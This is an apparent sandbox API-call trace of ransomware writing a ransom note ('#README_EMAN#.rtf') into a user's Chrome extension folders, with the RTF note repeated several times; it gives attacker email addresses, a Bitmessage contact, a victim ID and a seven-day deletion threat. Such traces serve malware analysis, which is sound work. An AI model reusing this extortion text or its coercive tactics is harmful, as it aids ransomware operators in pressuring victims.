butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.207] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.208] CloseHandle (hObject=0x294) returned 1 [0278.208] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\#readme_eman#.rtf")) returned 0xffffffff [0278.208] GetLastError () returned 0x2 [0278.208] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.208] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem 